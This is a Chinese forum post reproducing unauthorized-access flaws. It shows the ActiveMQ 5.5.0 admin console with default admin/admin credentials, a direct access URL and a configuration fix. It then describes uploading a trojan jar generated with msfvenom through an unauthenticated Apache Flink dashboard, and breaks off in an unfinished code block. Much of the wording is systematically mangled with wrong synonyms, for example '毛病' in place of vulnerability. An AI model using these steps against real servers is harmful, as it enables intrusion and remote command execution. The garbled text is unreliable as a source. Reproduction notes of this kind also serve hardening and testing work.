未授权毛病大赏

打印 上一主题 下一主题

主题 1003|帖子 1003|积分 3009

ActiveMQ未授权访问毛病

毛病形貌

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。
Apache ActiveMQ管理控制台的默认管理用户名和密码分别为admin和admin,用户可以未经授权使用默认凭据直接访问服务器,导致敏感信息泄露,并进一步举行攻击。
环境搭建

Download: http://archive.apache.org/dist/activemq/apache-activemq/5.5.0/apache-activemq-5.5.0-bin.tar.gz
  1. [root@localhost bin]# ./activemq start
  2. INFO: Using default configuration
  3. (you can configure options in one of these file: /etc/default/activemq /root/.activemqrc)
  4. INFO: Invoke the following command to create a configuration file
  5. ./activemq setup [ /etc/default/activemq | /root/.activemqrc ]
  6. INFO: Using java '/usr/bin/java'
  7. INFO: Starting - inspect logfiles specified in logging.properties and log4j.properties to get details
  8. INFO: pidfile created : '/tmp/apache-activemq-5.5.0/data/activemq.pid' (pid '2173')
复制代码
Vulnerability Reproduction

直接访问:http://192.168.32.183:8161/admin/queues.jsp
修复方案

编辑 ${ACTIVEMQ_HOME}/conf/jetty.xml开启身份验证,将authenticate属性改为true:
  1. <property name="authenticate" value="true" />
复制代码
编辑文件conf/jetty-realm.properties来更改Apache ActiveMQ的默认管理用户名和密码,格式如下:
重启服务就可以举行鉴权
Apache Flink未授权访问毛病

毛病形貌

Apache Flink Dashboard默认没有用户权限认证,攻击者可以通过未授权的Flink Dashboard控制台直接上传木马jar包,可长途执行恣意体系命令获取服务器权限。
环境搭建

测试版本:flink-1.15.1
修改flink-1.15.1/confflink-conf.yaml,将8081端口开启。
启动flink
  1. start-cluster.sh
复制代码
毛病使用

访问web页面。
使用msfovenom生成rce.jar
[code]┌──(root
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

美食家大橙子

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表